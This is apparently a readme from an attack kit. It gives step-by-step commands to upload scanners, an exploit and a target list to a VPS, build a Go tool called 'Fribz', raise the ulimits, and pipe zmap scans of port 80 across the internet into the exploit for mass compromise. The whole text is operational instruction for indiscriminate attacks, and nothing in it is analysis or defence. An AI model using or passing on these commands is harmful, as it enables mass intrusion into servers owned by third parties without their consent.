|=============================================|

1) Drag the scanner files and the exploit and list into the vps 

Type these commands

2) sh Scanner.sh

3) sh zmap.sh

4) yum install golang

5) go build Fribz.go

6) ulimit -e 999999; ulimit -u 999999; ulimit -n 999999; zmap -p80 -wips.zone -o- -q | ./Fribz 80
                                                                     ^your list goes here

ulimit -e 999999; ulimit -u 999999; ulimit -n 999999; zmap -p80 -q | ./Fribz 80
repeat with a new list....                                                                    
